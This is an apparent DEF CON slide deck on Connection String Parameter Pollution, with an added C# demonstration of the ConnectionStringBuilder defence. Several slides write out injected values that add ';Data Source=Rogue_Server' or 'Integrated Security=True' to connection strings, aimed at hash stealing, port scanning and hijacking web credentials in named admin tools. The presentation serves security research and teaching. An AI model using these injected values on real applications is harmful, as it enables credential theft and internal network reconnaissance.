Chema Alonso, Informática 64 - DEF CON

Connection Strings
• Define the way an application connects to a data repository
• There are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL,…)
– LDAP Directories
– Files
– Etc…

Databases Connection Strings
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;

Google Hacking

UDL (Universal Data Links) Files

Credentials
Operating System Accounts
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = SSPI/True/Yes;
Database Credentials
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = No;

Users authenticated by Web App
Web application manages the login process
1.- Web application connects to the database using its own credentials.
2.- Asks user for login information.
3.- Checks the login information against the info stored in the custom users table.
[Diagram: Database Engine (Syslogins, custom users table); connection string; "Select id from users"; App running on Web Server]

Users authenticated by Database
Database engine manages the login process
1.- Web application asks for credentials.
2.- A connection string is composed with the credentials to connect to the database.
3.- Roles and permissions are limited by the user used in the connection string.
[Diagram: Database Engine (Syslogins); connection string; App running on Web Server]

Connection String Attacks
• It's possible to inject parameters into connection strings using semicolons as separators
Data Source = myServerAddress;
Initial Catalog = myDataBase;
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;

ConnectionStringBuilder
• Available in .NET Framework 2.0
• Build secure connection strings using parameters
• It's not possible to inject into the connection string

Are people aware of this?

Connection String Parameter Pollution
• The goal is to inject parameters in the connection string, whether they exist or not
• If a parameter is duplicated, the last value wins
• This behavior allows attackers to completely rewrite the connection string, and therefore to manipulate the way the application will work and how it should be authenticated

Pollutionable Behavior
Param1=Value A   Param2=Value B   Param1=Value C   Param2=Value D
DBConnection Object
Param1
Param2

What can be done with CSPP?
Rewrite a parameter
Data Source=DB1   UID=sa   Data Source=DB2   password=Pwnd!
DBConnection Object
DataSource
UID
password

Scanning the DMZ
[Diagram: Internet; FW; Web app vulnerable to CSPP; DataSource pointing at Production Database, Development Database 1, Financial Database, Test Database, Forgotten Database]

Port Scanning a Server
[Diagram: Internet; FW; Web app vulnerable to CSPP; Production Database Server; DataSource values DB1,80  DB1,21  DB1,25  DB1,1445]

What can be done with CSPP?
Add a parameter
Data Source=DB1   UID=sa   Integrated Security=True   password=Pwnd!
DBConnection Object
DataSource
UID
password

CSPP Attack 1: Hash stealing
1.- Run a Rogue Server on an accessible IP address:
Rogue_Server
2.- Activate a sniffer to catch the login process
Cain/Wireshark
3.- Duplicate Data Source parameter
Data_Source=Rogue_Server
4.- Force Windows Integrated Authentication
Integrated Security=true

CSPP Attack 1: Hash stealing
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server; Password=;Integrated Security=True;

CSPP 1: ASP.NET Enterprise Manager

CSPP Attack 2: Port Scanning
1.- Duplicate the Data Source parameter, setting it to the target server and target port to be scanned.
Data_Source=Target_Server,target_Port
2.- Check the error messages:
– No TCP Connection -> Port is opened
– No SQL Server -> Port is closed
– SQL Server -> Invalid Password

CSPP Attack 2: Port Scanning
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port; Password=;Integrated Security=True;

CSPP 2: myLittleAdmin
Port is Opened

CSPP 2: myLittleAdmin
Port is Closed

CSPP Attack 3: Hijacking Web Credentials
1.- Duplicate Data Source parameter to the target SQL Server
Data_Source=Target_Server
2.- Force Windows Authentication
Integrated Security=true
3.- The application pool in which the web app is running will send its credentials in order to log in to the database engine.

CSPP Attack 3: Hijacking Web Credentials
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server; Password=;Integrated Security=true;

CSPP Attack 3: Web Data Administrator

CSPP Attack 3: myLittleAdmin/myLittleBackup

CSPP Attack 3: ASP.NET Enterprise Manager

Other Databases
• MySQL
– Does not support Integrated security
– It's possible to manipulate the behavior of the web application, although:
    • Port Scanning
    • Connect to internal/testing/development databases
• Oracle supports integrated authority running on Windows and UNIX/Linux servers
– It's possible to perform all described attacks
    • Hash stealing
    • Port Scanning
    • Hijacking Web credentials
– Also it's possible to elevate a connection to sysdba in order to shutdown/startup an instance

myLittleAdmin/myLittleBackup
myLittleTools released a security advisory and a patch about this

ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is "abandoned", but it's been used in a lot of web Control Panels.
• Fix the code yourself

ASP.NET Web Data Administrator
ASP Web Data Administrator is secure on the CodePlex web site, but not on the Microsoft web site, where an insecure old version has been published

Countermeasures
• Harden your firewall
– Outbound connections
• Harden your internal accounts
– Web application
– Web server
– Database Engine
• Use ConnectionStringBuilder
• Filter the ;)
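
Added example (not from the original slides or from any of the tools they name): the "Use ConnectionStringBuilder" countermeasure next to the concatenation pattern shown on the attack slides, in C# with System.Data.SqlClient. SQL2005, db1 and the two input values come from the slides; the class and method names and the pinned-settings check are assumptions made for illustration.

```csharp
using System;
using System.Data.SqlClient;

// Hypothetical demo class; names are illustrative, not from the tools on the slides.
static class ConnectionStringDemo
{
    const string ExpectedServer = "SQL2005";   // server name used on the slides

    // "Before": form values are concatenated straight into the string,
    // so a ';' in either field starts a new keyword=value pair.
    static string BuildByConcatenation(string user, string password)
    {
        return "Data Source=" + ExpectedServer + ";Initial Catalog=db1;" +
               "Integrated Security=no;User ID=" + user + ";Password=" + password + ";";
    }

    // "After": each value is assigned to a typed property. The builder
    // quotes values containing ';' or '=', so they cannot add keywords.
    static string BuildWithBuilder(string user, string password)
    {
        var builder = new SqlConnectionStringBuilder
        {
            DataSource = ExpectedServer,
            InitialCatalog = "db1",
            IntegratedSecurity = false,
            UserID = user,
            Password = password
        };
        return builder.ConnectionString;
    }

    // Defence in depth: re-parse the final string as the provider would and
    // refuse to connect if the pinned settings were overridden.
    static bool IsPinned(string connectionString)
    {
        var parsed = new SqlConnectionStringBuilder(connectionString);
        return string.Equals(parsed.DataSource, ExpectedServer,
                             StringComparison.OrdinalIgnoreCase)
            && !parsed.IntegratedSecurity;
    }

    static void Main()
    {
        // Constructed login-form input, using the values from the slides.
        string user = ";Data Source=Rogue_Server";
        string password = ";Integrated Security=True";

        foreach (var s in new[] { BuildByConcatenation(user, password),
                                  BuildWithBuilder(user, password) })
        {
            Console.WriteLine(s);
            Console.WriteLine("  pinned settings intact: " + IsPinned(s));
        }
    }
}
```

On .NET Framework this compiles as is; on current .NET, SqlConnectionStringBuilder comes from the System.Data.SqlClient or Microsoft.Data.SqlClient package.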

Questions?
Contact
Chema Alonso
[email protected]
http://www.informatica64.com
http://[email protected]
Authors
Chema Alonso
Manuel Fernández "The Sur"
Alejandro Martín Bailón
Antonio Guzmán